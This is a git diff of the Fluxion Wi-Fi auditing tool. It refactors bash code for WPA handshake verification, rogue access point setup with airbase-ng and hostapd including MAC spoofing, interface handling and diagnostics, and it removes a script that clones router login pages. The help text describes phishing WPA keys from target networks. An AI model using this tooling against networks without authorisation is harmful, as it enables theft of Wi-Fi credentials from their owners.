HashUtilsVersion="1.0" HashOutputDevice="/dev/stdout" function hash_check_handshake() { - local handshakeVerifier=$1 - local handshakePath=$2 - local handshakeAPSSID=$3 - local handshakeAPMAC=$4 + local -r handshakeVerifier=$1 + local -r handshakePath=$2 + local -r handshakeAPSSID=$3 + local -r handshakeAPMAC=$4 - local analysis - local hashData + echo "Verifier Parameters: " > $HashOutputDevice + echo " Verifier: $handshakeVerifier" > $HashOutputDevice + echo "Hash Path: $handshakePath" > $HashOutputDevice + echo "Hash SSID: \"$handshakeAPSSID\"" > $HashOutputDevice + echo " Hash MAC: $handshakeAPMAC" > $HashOutputDevice - echo "Verifier Parameters: $handshakeVerifier, path $handshakePath, SSID \"$handshakeAPSSID\", MAC $handshakeAPMAC" >$HashOutputDevice + local analysis # Since it's being used in all relevant instances. case "$handshakeVerifier" in - "pyrit") - readarray analysis < <(pyrit -r "$handshakePath" analyze 2>$HashOutputDevice) - if [ "${#analysis[@]}" -eq 0 -o $? != 0 ]; then - echo "Error: pyrit seems to be broken!" >$HashOutputDevice + "pyrit") + readarray analysis < <(pyrit -r "$handshakePath" analyze 2> $HashOutputDevice) + if [ "${#analysis[@]}" -eq 0 -o $? != 0 ]; then + echo "Error: pyrit seems to be broken!" > $HashOutputDevice + return 1 + fi + + local hashMeta=$(echo "${analysis[@]}" | grep -F "AccessPoint ${handshakeAPMAC,,} ('$handshakeAPSSID')") + + if [ "$hashMeta" ]; then + local hashID=$(echo "$hashMeta" | awk -F'[ #:]' '{print $3}') + local hashData=$(echo "${analysis[@]}" | awk "\$0~/#$hashID: HMAC_(SHA[0-9]+_AES|MD5_RC4)/{ print \$0 }") + else + echo "No valid hash meta was found for \"$handshakeAPSSID\"" > $HashOutputDevice + fi + ;; + "aircrack-ng") + readarray analysis < <(aircrack-ng "$handshakePath" 2> $HashOutputDevice) + if [ "${#analysis[@]}" -eq 0 -o $? != 0 ]; then + echo "Error: aircrack-ng seems to be broken!" > $HashOutputDevice + return 1 + fi + + local hashData=$(echo "${analysis[@]}" | grep -E "${handshakeAPMAC^^}\s+" | grep -F "$handshakeAPSSID") + ;; + *) + echo "Invalid verifier, quitting!" > $HashOutputDevice return 1 - fi - - local hashMeta=$(echo "${analysis[@]}" | grep -F "AccessPoint ${handshakeAPMAC,,} ('$handshakeAPSSID')") - - if [ "$hashMeta" ]; then - local hashID=$(echo "$hashMeta" | awk -F'[ #:]' '{print $3}') - hashData=$(echo "${analysis[@]}" | awk "\$0~/#$hashID: HMAC_SHA[0-9]+_AES/{ print \$0 }") - else - echo "No valid hash meta was found for \"$handshakeAPSSID\"" >$HashOutputDevice - fi - ;; - "aircrack-ng") - readarray analysis < <(aircrack-ng "$handshakePath" 2>$HashOutputDevice) - if [ "${#analysis[@]}" -eq 0 -o $? != 0 ]; then - echo "Error: aircrack-ng seems to be broken!" >$HashOutputDevice - return 1 - fi - - hashData=$(echo "${analysis[@]}" | grep -E "${handshakeAPMAC^^}\s+" | grep -F "$handshakeAPSSID") - ;; - *) - echo "Invalid verifier, quitting!" - return 1 - ;; + ;; esac if [ -z "$hashData" ]; then @@ -53,18 +56,24 @@ function hash_check_handshake() { return 1 fi - local hashResult case "$handshakeVerifier" in - "pyrit") hashResult=$(echo "$hashData" | grep "good") ;; - "aircrack-ng") hashResult=$(echo "$hashData" | grep "(1 handshake)") ;; + "pyrit") + if echo "$hashData" | grep -qF "good"; then + local -r hashResult=1 + fi ;; + + "aircrack-ng") + if echo "$hashData" | grep -qE "\([0-9]+ handshake\)"; then + local -r hashResult=1 + fi ;; esac if [ -z "$hashResult" ]; then - echo "Invalid hash for $handshakeAPSSID ($handshakeAPMAC)!" + echo "Invalid hash for $handshakeAPSSID ($handshakeAPMAC)!" > $HashOutputDevice HASHCheckHandshake="invalid" return 1 else - echo "Valid hash for $handshakeAPSSID ($handshakeAPMAC)!" + echo "Valid hash for $handshakeAPSSID ($handshakeAPMAC)!" > $HashOutputDevice HASHCheckHandshake="valid" fi } diff --git a/lib/Help.sh b/lib/Help.sh new file mode 100644 index 0000000..9ffdb99 --- /dev/null +++ b/lib/Help.sh @@ -0,0 +1,96 @@ +#!/bin/bash + +function fluxion_help{ + echo " FLUXION(1) User Manuals FLUXION(1) + + + + NAME + fluxion - Fluxion is a security auditing and social-engineering + research tool + + SYNOPSIS + fluxion [-debug] [-l language ] attack ... + + DESCRIPTION + fluxion is a security auditing and social-engineering research tool. + It is a remake of linset by vk496 with (hopefully) less bugs and more + functionality. The script attempts to retrieve the WPA/WPA2 key from a + target access point by means of a social engineering (phising) attack. + It's compatible with the latest release of Kali (rolling). Fluxion's + attacks' setup is mostly manual, but experimental auto-mode handles + some of the attacks' setup parameters. + + OPTIONS + -v Print version number. + + --help Print help page and exit with 0. + + -m Run fluxion in manual mode instead of auto mode. + + -k Kill wireless connection if it is connected. + + -d Run fluxion in debug mode. + + -x Try to run fluxion with xterm terminals instead of tmux. + + -r Reload driver. + + -l + Define a certain language. + + -e + Select the target network based on the ESSID. + + -c + Indicate the channel(s) to listen to. + + -a + Define a certain attack. + + --ratio + Define the windows size. Bigger ratio -> smaller window size. + Default is 4. + + -b + Select the target network based on the access point MAC address. + + -j + Define a certain jamming interface. + + -a + Define a certain access point interface. + + FILES + /tmp/fluxspace/ + The system wide tmp directory. + $FLUXION/attacks/ + Folder where handshakes and passwords are stored in. + + ENVIRONMENT + FLUXIONAuto + Automatically run fluxion in auto mode if exported. + + FLUXIONDebug + Automatically run fluxion in debug mode if exported. + + FLUXIONWIKillProcesses + Automatically kill any interfering process(es). + + DIAGNOSTICS + Please checkout the other log files or use the debug mode. + + BUGS + Please report any bugs at: https://github.com/FluxionNetwork/flux- + ion/issues + + AUTHOR + Cyberfee, l3op, dlinkproto, vk496, MPX4132 + + SEE ALSO + aircrack-ng(8), + + + Linux MARCH 2018 FLUXION(1)" + +} diff --git a/lib/InterfaceUtils.sh b/lib/InterfaceUtils.sh index 75a8ed9..9156c19 100755 --- a/lib/InterfaceUtils.sh +++ b/lib/InterfaceUtils.sh @@ -11,22 +11,20 @@ if [ -d /sys/bus/usb ] # && hash lsusb; then InterfaceUSBBus=1 fi -if [ -d /sys/bus/pci ] || [ -d /sys/bus/pci_express ] || [ -d /proc/bus/pci ] # && hash lspci; +if [ -d /sys/bus/pci -o -d /sys/bus/pci_express -o -d /proc/bus/pci ] # && hash lspci; then InterfacePCIBus=1 fi # Checks if the interface belongs to a physical device. function interface_is_real() { - if [ -d /sys/class/net/$1/device ]; then return 0 - else return 1 - fi + test -d /sys/class/net/$1/device + return $? } # Checks if the interface belongs to a wireless device. function interface_is_wireless() { - if grep -qs "DEVTYPE=wlan" /sys/class/net/$1/uevent; then return 0 - else return 1 - fi + grep -qs "DEVTYPE=wlan" /sys/class/net/$1/uevent + return $? } # Returns an array of absolutely all interfaces. @@ -146,64 +144,39 @@ function interface_state() { function interface_set_state() { if [ "${#@}" -ne 2 ]; then return 1; fi + # TODO: Add alternatives to 'ip' in case of failure. ip link set "$1" "$2" + return $? } function interface_set_mode() { if [ "${#@}" -ne 2 ]; then return 1; fi if ! interface_set_state "$1" "down"; then return 2; fi - if ! iwconfig "$1" mode "$2" &>$InterfaceUtilsOutputDevice; then return 3; fi + if ! iw dev "$1" set type "$2" &> $InterfaceUtilsOutputDevice; then + if ! iwconfig "$1" mode "$2" &> $InterfaceUtilsOutputDevice + then return 3 + fi + fi if ! interface_set_state "$1" "up"; then return 4; fi } -function interface_prompt() { - if [ -z "$1" -o -z "$2" ]; then return 1; fi - - local __interface_prompt__ifAvailable=("${!2}") - local __interface_prompt__ifAvailableInfo=() - local __interface_prompt__ifAvailableColor=() - local __interface_prompt__ifAvailableState=() - - local __interface_prompt__ifCandidate - for __interface_prompt__ifCandidate in "${__interface_prompt__ifAvailable[@]}"; do - interface_chipset "$__interface_prompt__ifCandidate" - __interface_prompt__ifAvailableInfo+=("$InterfaceChipset") - - interface_state "$__interface_prompt__ifCandidate" - - if [ "$InterfaceState" = "up" ]; then - __interface_prompt__ifAvailableColor+=("$CPrp") - __interface_prompt__ifAvailableState+=("[-]") - else - __interface_prompt__ifAvailableColor+=("$CClr") - __interface_prompt__ifAvailableState+=("[+]") - fi - done - - # The following conditional is required since io_query_format_fields - # only considers the the size of the first parameter, available color. - if [ "$6" ]; then # Add alternative choices - __interface_prompt__ifAvailable+=("${!3}") - __interface_prompt__ifAvailableInfo+=("${!4}") - __interface_prompt__ifAvailableState+=("${!5}") - __interface_prompt__ifAvailableColor+=("${!6}") +function interface_reidentify() { + if [ ${#@} -ne 2 ]; then return 1; fi + + local -r __interface_reidentify__oldIdentifier=$1 + local -r __interface_reidentify__newIdentifier=$2 + + if [[ $__interface_reidentify__newIdentifier == *" "* ]] + then return 2 fi - - # If only one interface exists and it's available, choose it. - if [ "${#__interface_prompt__ifAvailable[@]}" -eq 1 -a "${__interface_prompt__ifAvailableState[0]}" = "[+]" ]; then - InterfacePromptWISelected="${__interface_prompt__ifAvailable[0]}" - InterfacePromptWISelectedState="[+]" # It passed the condition, it must be + - InterfacePromptWISelectedInfo="${__interface_prompt__ifAvailableInfo[0]}" - else - format_apply_autosize "$CRed[$CSYel%1d$CClr$CRed]%b %-8b %3s$CClr %-*.*s\n" - io_query_format_fields "$1" "$FormatApplyAutosize" \ - __interface_prompt__ifAvailableColor[@] __interface_prompt__ifAvailable[@] \ - __interface_prompt__ifAvailableState[@] __interface_prompt__ifAvailableInfo[@] - - echo - - InterfacePromptIfSelected="${IOQueryFormatFields[1]}" - InterfacePromptIfSelectedState="${IOQueryFormatFields[2]}" - InterfacePromptWISelectedInfo="${IOQueryFormatFields[3]}" + + if ! interface_set_state $__interface_reidentify__oldIdentifier down + then return 3 fi + + # TODO: Add alternatives to 'ip' in case of failure. + ip link set $__interface_reidentify__oldIdentifier name $__interface_reidentify__newIdentifier + return $? } + +# FLUXSCRIPT END diff --git a/lib/ap/airbase-ng.sh b/lib/ap/airbase-ng.sh index 802e3e4..c32c58f 100755 --- a/lib/ap/airbase-ng.sh +++ b/lib/ap/airbase-ng.sh @@ -3,55 +3,87 @@ # ================================================================ # Configuration Section # ================================================================ -VIGW="at0" -VIAP=$WIAccessPoint - -# airbase-ng uses a monitor-mode virtual interface -# and creates a separate interface, atX, for dhcpd. -VIAPAddress="$VIGWNetwork.2" - -# APServiceConfigDirectory=$FLUXIONWorkspacePath +#APServiceConfigDirectory=$FLUXIONWorkspacePath # ================================================================ #if [ "$APServiceVersion" ]; then return 0; fi #readonly APServiceVersion="1.0" -function ap_stop() { - if [ "$APServicePID" ]; then kill $APServicePID &>$FLUXIONOutputDevice +function ap_service_stop() { + if [ "$APServicePID" ]; then + kill $APServicePID &> $FLUXIONOutputDevice fi APServicePID="" } -function ap_reset() { - ap_stop +function ap_service_reset() { + ap_service_stop + + APServiceAccessInterface="" + + APServiceChannel="" + APServiceMAC="" + APServiceSSID="" + APServiceInterfaceAddress="" + APServiceInterface="" } -function ap_route() { - ifconfig $VIAP $VIAPAddress netmask 255.255.255.0 - sysctl net.ipv6.conf.at0.disable_ipv6=1 &>$FLUXIONOutputDevice +function ap_service_route() { + local networkSubnet=${APServiceInterfaceAddress%.*} + local networkAddress=$(( ( ${APServiceInterfaceAddress##*.} + 1 ) % 255 )) + + if [ $hostID -eq 0 ]; then + let hostID++ + fi + + # TODO: Dynamically get the airbase-ng tap interface & use below. + # WARNING: Notice the interface below is STATIC, it'll break eventually! + if ! ifconfig "at0" $networkSubnet.$networkAddress \ + netmask 255.255.255.0; then + return 1 + fi + + if ! sysctl net.ipv6.conf.at0.disable_ipv6=1 &> $FLUXIONOutputDevice; then + return 2 + fi } -function ap_prep() { - ap_stop +function ap_service_prep() { + if [ ${#@} -lt 5 ]; then return 1; fi + + APServiceInterface=$1 + APServiceInterfaceAddress=$2 + APServiceSSID=$3 + APServiceMAC=$4 + APServiceChannel=$5 + + ap_service_stop # Spoof virtual interface MAC address. # This is done by airbase-ng automatically. + + # airbase-ng uses a monitor-mode virtual interface + # and creates a separate interface, atX, for dhcpd. + APServiceAccessInterface="at0" } -function ap_start() { - ap_stop +function ap_service_start() { + ap_service_stop - xterm $FLUXIONHoldXterm $TOP -bg "#000000" -fg "#FFFFFF" -title "FLUXION AP Service [airbase-ng]" -e airbase-ng -P -e $APTargetSSID -c $APTargetChannel -a $APRogueMAC $VIAP & + xterm $FLUXIONHoldXterm $TOP -bg "#000000" -fg "#FFFFFF" \ + -title "FLUXION AP Service [airbase-ng]" -e \ + airbase-ng -P -e $APServiceSSID -c $APServiceChannel \ + -a $APServiceMAC $APServiceInterface & local parentPID=$! - # Wait till airebase-ng has started and created the extra virtual interface. + # Wait till airebase-ng starts and creates the extra virtual interface. while [ ! "$APServicePID" ]; do sleep 1 APServicePID=$(pgrep -P $parentPID) done - ap_route + ap_service_route } # FLUXSCRIPT END diff --git a/lib/ap/hostapd.sh b/lib/ap/hostapd.sh index 14d26c9..93438ed 100755 --- a/lib/ap/hostapd.sh +++ b/lib/ap/hostapd.sh @@ -3,69 +3,87 @@ # ================================================================ # Configuration Section # ================================================================ -VIGW=$WIAccessPoint -VIAP=$WIAccessPoint - -# HostAPD sets the virtual interface mode -# to master, which is supported by dhcpd. -VIAPAddress=$VIGWAddress - APServiceConfigDirectory=$FLUXIONWorkspacePath # ================================================================ #if [ "$APServiceVersion" ]; then return 0; fi #readonly APServiceVersion="1.0" -function ap_stop() { - if [ "$APServicePID" ]; then kill $APServicePID &>$FLUXIONOutputDevice +function ap_service_stop() { + if [ "$APServicePID" ]; then + kill $APServicePID &> $FLUXIONOutputDevice fi APServicePID="" } -function ap_reset() { - ap_stop +function ap_service_reset() { + ap_service_stop # Reset MAC address to original. - ifconfig $VIAP down + ifconfig $APServiceInterface down sleep 0.5 - macchanger -p $VIAP &>$FLUXIONOutputDevice + macchanger -p $APServiceInterface &> $FLUXIONOutputDevice sleep 0.5 - ifconfig $VIAP up + ifconfig $APServiceInterface up sleep 0.5 + + APServiceAccessInterface="" + + APServiceChannel="" + APServiceMAC="" + APServiceSSID="" + APServiceInterfaceAddress="" + APServiceInterface="" + } -function ap_route() { - echo "APService: No custom routes for hostapd" >$FLUXIONOutputDevice +function ap_service_route() { + echo "APService: No custom routes for hostapd" > $FLUXIONOutputDevice } -function ap_prep() { - ap_stop +function ap_service_prep() { + if [ ${#@} -lt 5 ]; then return 1; fi + + APServiceInterface=$1 + APServiceInterfaceAddress=$2 + APServiceSSID=$3 + APServiceMAC=$4 + APServiceChannel=$5 + + ap_service_stop # Prepare the hostapd config file. echo "\ -interface=$VIAP +interface=$APServiceInterface driver=nl80211 -ssid=$APTargetSSID -channel=$APTargetChannel" >"$APServiceConfigDirectory/$APRogueMAC-hostapd.conf" +ssid=$APServiceSSID +channel=$APServiceChannel" \ + > "$APServiceConfigDirectory/$APServiceMAC-hostapd.conf" # Spoof virtual interface MAC address. - ifconfig $VIAP down + ifconfig $APServiceInterface down sleep 0.5 - macchanger --mac=$APRogueMAC $VIAP &>$FLUXIONOutputDevice + macchanger --mac=$APServiceMAC $APServiceInterface &> $FLUXIONOutputDevice sleep 0.5 - ifconfig $VIAP up + ifconfig $APServiceInterface up sleep 0.5 + + # HostAPD sets the virtual interface mode + # to master, which is supported by dhcpd. + APServiceAccessInterface=$APServiceInterface } -function ap_start() { - ap_stop +function ap_service_start() { + ap_service_stop - xterm $FLUXIONHoldXterm $TOP -bg "#000000" -fg "#FFFFFF" -title "FLUXION AP Service [hostapd]" -e hostapd "$APServiceConfigDirectory/$APRogueMAC-hostapd.conf" & + xterm $FLUXIONHoldXterm $TOP -bg "#000000" -fg "#FFFFFF" \ + -title "FLUXION AP Service [hostapd]" -e \ + hostapd "$APServiceConfigDirectory/$APServiceMAC-hostapd.conf" & local parentPID=$! # Wait till hostapd has started and its virtual interface is ready. @@ -74,7 +92,7 @@ function ap_start() { APServicePID=$(pgrep -P $parentPID) done - ap_route + ap_service_route } # FLUXSCRIPT END diff --git a/misc/README.md b/misc/README.md new file mode 100644 index 0000000..5469cf4 --- /dev/null +++ b/misc/README.md @@ -0,0 +1,19 @@ +## Arguments table + +| Arguments | Describtion | +| ------------- | ------------- | +| -a | Give a Attack | +| -e | Give a certain essid | +| -b | Give a certain bssid | +| -- | Maker is required | +| -a | Access point interface | +| -j | Jamming interface | +| -x | Use xterm instead of tmux | +| -v | Print version number | +| -d | Run fluxion in debug mode | +| -k | Kill wireless connection if it is connected | +| -m | Run fluxion in manual mode instead of auto | +| -l | Language | + +## Samples +`./fluxion -a [ATTACK] -e [ESSID] -b [BSSID] -c [CHANNEL] -- -a [AP INTERFACE] -j [JAMMING INTERFACE]` diff --git a/preferences/.gitkeep b/preferences/.gitkeep new file mode 100644 index 0000000..e69de29 diff --git a/scripts/debug.sh b/scripts/debug.sh index 8ecf4b3..cd4d8a1 100755 --- a/scripts/debug.sh +++ b/scripts/debug.sh @@ -1,4 +1,6 @@ #!/ bin / bash -export FLUXIONDebug = 1 export FLUXIONWIKillProcesses = - 1 export FLUXIONWIReloadDriver = 1 +# These are the debug flags used by the script +export FLUXIONDebug=1 +export FLUXIONWIKillProcesses=1 +export FLUXIONWIReloadDriver=1 diff --git a/scripts/diagnostics.sh b/scripts/diagnostics.sh index 4439d5f..f766015 100755 --- a/scripts/diagnostics.sh +++ b/scripts/diagnostics.sh @@ -1,66 +1,89 @@ #!/bin/bash -if [ -d "lib" ]; then source lib/InterfaceUtils.sh -elif [ -d "../lib" ]; then source ../lib/InterfaceUtils.sh +clear +declare -r HEADER_SIZE="####" + +# Diagnostic script + +if [ -d "lib" ];then + source lib/InterfaceUtils.sh +elif [ -d "../lib" ];then + source ../lib/InterfaceUtils.sh else - echo "YOU MUST EXECUTE THIS SCRIPT FROM FLUXION'S ROOT!" + echo -e "\033[31mError lib folder not found\033[0m" exit 1 fi if [ ! "$1" ]; then - echo "Usage ./scripts/diagnostics " + echo "Usage ./scripts/diagnostics [wireless_interface]" exit 1 fi -echo "[ FLUXION Info ]" -if [ -f "./fluxion.sh" ] - then declare -r FLUXIONInfo=($(grep -oE "FLUXION(Version|Revision)=[0-9]+" fluxion.sh)) - else declare -r FLUXIONInfo=($(grep -oE "FLUXION(Version|Revision)=[0-9]+" ../fluxion.sh)) +echo "$HEADER_SIZE FLUXION Info" +if [ -f "fluxion" ];then + declare -r FLUXIONInfo=($(grep -oE "FLUXION(Version|Revision)=[0-9]+" fluxion)) +else + declare -r FLUXIONInfo=($(grep -oE "FLUXION(Version|Revision)=[0-9]+" ../fluxion)) fi echo "FLUXION V${FLUXIONInfo[0]/*=/}.${FLUXIONInfo[1]/*=/}" echo -ne "\n\n" -echo "[ BASH Info ]" +echo "$HEADER_SIZE BASH Info " bash --version -echo "Path: $(ls -L $(which bash))" +echo "**Path:** $(ls -L $(which bash))" echo -ne "\n\n" -echo "[ Interface ($1) Info ]" -if interface_physical "$1"; then echo "Device: $InterfacePhysical" -else echo "Device: Unknown" +echo "$HEADER_SIZE Interface ($1) Info " +if interface_physical "$1";then + echo "**Device**: $InterfacePhysical" +else + echo "**Device:** Unknown" fi -if interface_driver "$1"; then echo "Driver: $InterfaceDriver" -else echo "Driver: Unsupported" +if interface_driver "$1";then + echo "**Driver:** $InterfaceDriver" +else + echo "**Driver:** Unsupported" fi -if interface_chipset "$1"; then echo "Chipset: $InterfaceChipset" -else echo "Chipset: Unknown" +if interface_chipset "$1";then + echo "**Chipset:** $InterfaceChipset" +else + echo "**Chipset:** Unknown" fi -echo -n "Injection Test: " -aireplay-ng --test "$1" | grep -oE "Injection is working!|No Answer..." || echo "failed" +if iw list | grep monitor | head -n 1 | tail -n 1 &>/dev/null;then + echo "**Master Modes** Yes" +else + echo "**Master Modes** No" +fi + +echo -n "**Injection Test:** " +aireplay-ng --test "$1" | grep -oE "Injection is working!|No Answer..." || echo -e "\033[31mFailed\033[0m" echo -ne "\n\n" -echo "[ XTerm Info ]" -echo "Version: $(xterm -version)" -echo "Path: $(ls -L $(which xterm))" +echo "$HEADER_SIZE XTerm Infos" +echo "**Version:** $(xterm -version)" +echo "**Path:** $(ls -L $(which xterm))" echo -n "Test: " if xterm -hold -fg "#FFFFFF" -bg "#000000" -title "XServer/XTerm Test" -e "echo \"XServer/XTerm test: close window to continue...\"" &>/dev/null; then echo "XServer/XTerm success!" -else echo "XServer/XTerm failure!" +else + echo -e "\033[31m XServer/XTerm failure!\033[0m" fi echo -ne "\n\n" -echo "[ HostAPD Info ]" +echo "$HEADER_SIZE HostAPD Info" hostapd -v echo "Path: $(ls -L $(which hostapd))" echo -ne "\n\n" -echo "[ Aircrack-ng Info ]" +echo "$HEADER_SIZE Aircrack-ng Info" aircrack-ng -H | head -n 4 -echo -ne "\n\n" +echo -ne "\n" -echo "[ System Info ]" -if [ -r "/proc/version" ]; then cat /proc/version -else uname -r +echo "$HEADER_SIZE System Info" +if [ -r "/proc/version" ]; then + echo "**Chipset:** $(cat /proc/version)" +else + echo "**Chipset:** $(uname -r)" fi diff --git a/scripts/router.sh b/scripts/router.sh deleted file mode 100755 index 0489105..0000000 --- a/scripts/router.sh +++ /dev/null @@ -1,70 +0,0 @@ -#!/bin/bash - -##################################### < CONFIGURATION > ##################################### - -gateway=$(ip route | grep default | awk '{print $3}') - -#Colors -white="\033[1;37m" -red="\033[1;31m" -blue="\033[1;34m" -transparent="\e[0m" - -############################################################################################# - -clear -echo -e "$red[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]" -echo -e "$red Prepare router page." -echo -e "$blue[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]""$transparent" -echo "[i] Prepare dep." - -# Check which package manager is installed -echo "Package Manager" -if hash pacman 2>/dev/null; then - PACK="pacman -S" -else - if hash apt-get 2>/dev/null; then - PACK="apt-get install" - else - if hash yum 2>/dev/null; then - PACK="yum install" - fi - fi -fi -sleep 0.025 -echo "=================================================================================" - -echo -ne "Httrack........." -if ! hash httrack 2>/dev/null; then - echo -e "\e[1;31mNot installed"$transparent"" - $PACK httrack -else - echo -e "\e[1;32mOK!"$transparent"" -fi -sleep 0.025 -echo "=================================================================================" - -echo -ne "cutycapt........" -if ! hash httrack 2>/dev/null; then - echo -e "\e[1;31mNot installed"$transparent"" - $PACK cutycapt -else - echo -e "\e[1;32mOK!"$transparent"" -fi -sleep 0.025 -echo "=================================================================================" - -if [ ! -d sites ]; then - mkdir sites -fi - -############################################################################################# -echo "[i] Download preview picture" -cutycapt --url=http://$gateway --out=sites/$(date | awk '{print $4}').png -echo "=================================================================================" - -cd sites -echo "[i] Download router site" -httrack $gateway -echo "=================================================================================" -echo "[I] DONE"